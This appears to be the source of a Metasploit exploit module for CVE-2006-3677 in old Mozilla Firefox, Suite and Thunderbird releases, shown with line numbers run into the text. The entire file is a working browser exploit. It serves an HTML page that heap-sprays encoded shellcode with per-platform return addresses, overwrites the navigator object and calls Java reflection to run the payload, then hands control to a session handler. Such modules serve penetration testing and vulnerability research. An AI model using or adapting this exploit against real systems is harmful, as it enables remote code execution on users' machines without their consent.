Path: blob/master/modules/exploits/multi/browser/mozilla_navigatorjava.rb
32109 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::HttpServer::HTML910# include Msf::Exploit::Remote::BrowserAutopwn11# autopwn_info({12# :ua_name => HttpClients::FF,13# :ua_minver => "1.5.0",14# :ua_maxver => "1.5.1",15# :javascript => true,16# :rank => NormalRanking, # reliable memory corruption17# :vuln_test => %Q|18# is_vuln = false;19# if (navigator.javaEnabled()){20# is_vuln = true;21# }22# |,23# })2425def initialize(info = {})26super(27update_info(28info,29'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution',30'Description' => %q{31This module exploits a code execution vulnerability in the Mozilla32Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit33requires the Java plugin to be installed.34},35'License' => MSF_LICENSE,36'Author' => ['hdm'],37'References' => [38['CVE', '2006-3677'],39['OSVDB', '27559'],40['BID', '19192'],41['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html']42],43'Payload' => {44'Space' => 512,45'BadChars' => ''46},47'Targets' => [48[49'Firefox 1.5.0.4 Windows x86',50{51'Platform' => 'win',52'Arch' => ARCH_X86,53'Ret' => 0x08000800,54'Fill' => '%u0800'55}56],57[58'Firefox 1.5.0.4 Linux x86',59{60'Platform' => 'linux',61'Arch' => ARCH_X86,62'Ret' => -0x58000000,63'Fill' => '%ua8a8'64}65],66[67'Firefox 1.5.0.4 Mac OS X PPC',68{69'Platform' => 'osx',70'Arch' => ARCH_PPC,71'Ret' => 0x0c000000,72'Fill' => '%u0c0c'73}74],75[76'Firefox 1.5.0.4 Mac OS X x86',77{78'Platform' => 'osx',79'Arch' => ARCH_X86,80'Ret' => 0x1c000000,81'Fill' => '%u1c1c'82}83],84],85'DisclosureDate' => '2006-07-25',86'Notes' => {87'Reliability' => UNKNOWN_RELIABILITY,88'Stability' => UNKNOWN_STABILITY,89'SideEffects' => UNKNOWN_SIDE_EFFECTS90}91)92)93end9495def on_request_uri(cli, _request)96# Re-generate the payload97return if ((p = regenerate_payload(cli)).nil?)9899print_status("Sending #{name}")100send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })101102# Handle the payload103handler(cli)104end105106def generate_html(payload)107enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))108109return %|110<html><head>111<script>112function Exploit() {113if (window.navigator.javaEnabled) {114var shellcode = unescape("#{enc_code}");115var b = unescape("#{target['Fill']}");116while (b.length <= 0x400000) b+=b;117118var c = new Array();119for (var i =0; i<36; i++) {120c[i] =121b.substring(0, 0x100000 - shellcode.length) + shellcode +122b.substring(0, 0x100000 - shellcode.length) + shellcode +123b.substring(0, 0x100000 - shellcode.length) + shellcode +124b.substring(0, 0x100000 - shellcode.length) + shellcode;125}126127window.navigator = (#{target['Ret']} / 2);128try {129java.lang.reflect.Runtime.newInstance(130java.lang.Class.forName("java.lang.Runtime"), 0131);132}catch(e){133134}135}136}137</script>138</head><body onload='Exploit()'>Please wait...</body></html>139|140end141end142143144